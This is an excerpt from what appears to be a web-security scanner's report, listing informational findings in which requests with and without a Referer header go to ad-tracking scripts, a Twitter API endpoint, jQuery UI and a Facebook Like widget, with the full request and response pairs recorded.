User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Connection: close
Content-Type: text/html


15.2. http://480-adver-view.c3metrics.com/v.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Request 1

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new RegExp(a);var f=document.getElementsByTagName('script');var g=f.length;for(var i=c3VTconstVal.c3VJSconst.c3VJSscriptLimit;i<g;i++){if(r.exec(f[i]['src'])){d=f[i];d.parentNode.insertBefore(e,d.nextSibling);c3VTconstVal.c3VJSconst.c3VJSscriptLimit=i+1;i=g}}}}}var c3obj=String(Math.floor(Math.random()*100));window.c3VTconstVal.c3VJSconst.c3VJScollection[c3obj]=new fireC3VTJS();window.c3VTconstVal.c3VJSconst.c3VJScollection[c3obj].fireCall();

Request 2

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:55 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Connection: close
Content-Type: text/html


15.3. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Request 1

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955581-43234-51315
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:41 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04042
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e74652c3d440cadd935e7e0b1675c0679bbdd85f
X-RateLimit-Reset: 1304959140
Set-Cookie: original_referer=ZLhHHTiegr%2FMnOT%2Fp8liqKLpSbkz6bAtT4p5bnOw1ZAfyga3xOTsMg%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFzzadUvAToHaWQiJTM5Yjg2NzFhNGIzMWUw%250AZTAxOGEzYjc2YjE1OWFjZGRkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2ae163b2825351976cb494802b1d845f55f5087e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel=\"nofollow\"\u003ETwitter for Android\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 15:04:47 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"follow_request_sent":null,"following":null,"friends_count":11,"profile_background_color":"C0DEED","description":"I am the morning reporter and Morning Call anchor at FOX 8 in New Orleans .","screen_name":"EAndersonWVUE","statuses_count":28,"profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303316982\/images\/themes\/theme1\/bg.png","verified":false,"id_str":"250828887","is_translator":false,"profile_text_color":"333333","location":"New Orleans, LA ","listed_count":4,"contributors_enabled":false,"profile_sidebar_fill_color":"DDEEF6","profile_background_tile":false,"url":"http:\/\/www.fox8live.com","lang":"en","followers_count":38,"protected":false,"notifications":null,"time_zone":"Central Time (US & Canada)","created_at":"Fri Feb 11 22:06:33 +0000 2011","profile_link_color":"0084B4","name":"Evan Anderson","default_profile_image":false,"default_profile":true,"profile_sidebar_border_color":"C0DEED","id":250828887,"show_all_inline_media":true,"geo_enabled":false,"utc_offset":-21600,"favourites_count":0,"profile_
...[SNIP]...

Request 2

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955592-41835-26748
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:52 GMT
X-RateLimit-Remaining: 121
X-Runtime: 0.03563
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 6ffa38b55abc73740c83d1287278cbf36df23288
X-RateLimit-Reset: 1304959140
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJIfatUvAToHaWQiJTk4Y2FjMDBkYjVlZjdh%250AZDJhMTI0ZGUwMmVlYmM0NzZhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cd54e78447e410fdd3d04babd83b43e59777fe00; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel=\"nofollow\"\u003ETwitter for Android\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 15:04:47 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"follow_request_sent":null,"following":null,"friends_count":11,"profile_background_color":"C0DEED","description":"I am the morning reporter and Morning Call anchor at FOX 8 in New Orleans .","screen_name":"EAndersonWVUE","statuses_count":28,"profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303316982\/images\/themes\/theme1\/bg.png","verified":false,"id_str":"250828887","is_translator":false,"profile_text_color":"333333","location":"New Orleans, LA ","listed_count":4,"contributors_enabled":false,"profile_sidebar_fill_color":"DDEEF6","profile_background_tile":false,"url":"http:\/\/www.fox8live.com","lang":"en","followers_count":38,"protected":false,"notifications":null,"time_zone":"Central Time (US & Canada)","created_at":"Fri Feb 11 22:06:33 +0000 2011","profile_link_color":"0084B4","name":"Evan Anderson","default_profile_image":false,"default_profile":true,"profile_sidebar_border_color":"C0DEED","id":250828887,"show_all_inline_media":true,"geo_enabled":false,"utc_offset":-21600,"favourites_count":0,"profile_image_url":"http:\/\/a3.twimg.com\/profile_images\/1253535787\/bio_head_shot_normal.jpg"},"retweeted":f
...[SNIP]...

15.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Request 1

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ECB3DBA48FEF66EDAE9A7E846E561B69; Path=/
Content-Type: text/javascript
Content-Length: 8015
Date: Mon, 09 May 2011 15:39:50 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasO
...[SNIP]...

Request 2

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E7476F46E47DA0A90EC8F6D5D1422C91; Path=/
Content-Type: text/javascript
Content-Length: 7986
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasOwnProperty(E)){B.push({key:E,
...[SNIP]...

15.5. http://jqueryui.com/ui/jquery.ui.widget.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://jqueryui.com
Path:   /ui/jquery.ui.widget.js

Request 1

GET /ui/jquery.ui.widget.js HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/topics/reporter/Doyle+Rice
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=77982607.1303160339.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=77982607.804821504.1303160339.1303160339.1303160339.1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:43:16 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: http://hotlink.jquery.com/jqueryui/ui/jquery.ui.widget.js
X-Proxy: 2

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

Request 2

GET /ui/jquery.ui.widget.js HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=77982607.1303160339.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=77982607.804821504.1303160339.1303160339.1303160339.1

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:43:17 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Sat, 23 Apr 2011 13:21:46 GMT
ETag: "240c59-1ad1-4a195db29ee80"
Accept-Ranges: bytes
Content-Length: 6865
X-Served-By: www3
X-Proxy: 2

/*!
* jQuery UI Widget 1.8.12
*
* Copyright 2011, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.com/UI/Widget
*/
(function( $, undefined ) {

// jQuery 1.4+
if ( $.cleanData ) {
   var _cleanData = $.cleanData;
   $.cleanData = function( elems ) {
       for ( var i = 0, elem; (elem = elems[i]) != null; i++ ) {
           $( elem ).triggerHandler( "remove" );
       }
       _cleanData( elems );
   };
} else {
   var _remove = $.fn.remove;
   $.fn.remove = function( selector, keepData ) {
       return this.each(function() {
           if ( !keepData ) {
               if ( !selector || $.filter( selector, [ this ] ).length ) {
                   $( "*", this ).add( [ this ] ).each(function() {
                       $( this ).triggerHandler( "remove" );
                   });
               }
           }
           return _remove.call( $(this), selector, keepData );
       });
   };
}

$.widget = function( name, base, prototype ) {
   var namespace = name.split( "." )[ 0 ],
       fullName;
   name = name.split( "." )[ 1 ];
   fullName = namespace + "-" + name;

   if ( !prototype ) {
       prototype = base;
       base = $.Widget;
   }

   // create selector for plugin
   $.expr[ ":" ][ fullName ] = function( elem ) {
       return !!$.data( elem, name );
   };

   $[ namespace ] = $[ namespace ] || {};
   $[ namespace ][ name ] = function( options, element ) {
       // allow instantiation without initializing for simple inheritance
       if ( arguments.length ) {
           this._createWidget( options, element );
       }
   };

   var basePrototype = new base();
   // we need to make the options hash a property directly on the new instance
   // otherwise we'll modify the options hash on the prototype that we're
   // inheriting from
//    $.each( basePrototype, function( ke
...[SNIP]...

15.6. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"67882412",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc809aa7c94f7954749862" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td><td class="connect_widget_button_count
...[SNIP]...

Request 2

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.114.35
X-Cnection: close
Date: Mon, 09 May 2011 15:35:16 GMT
Content-Length: 6866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"4fe82ae0",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

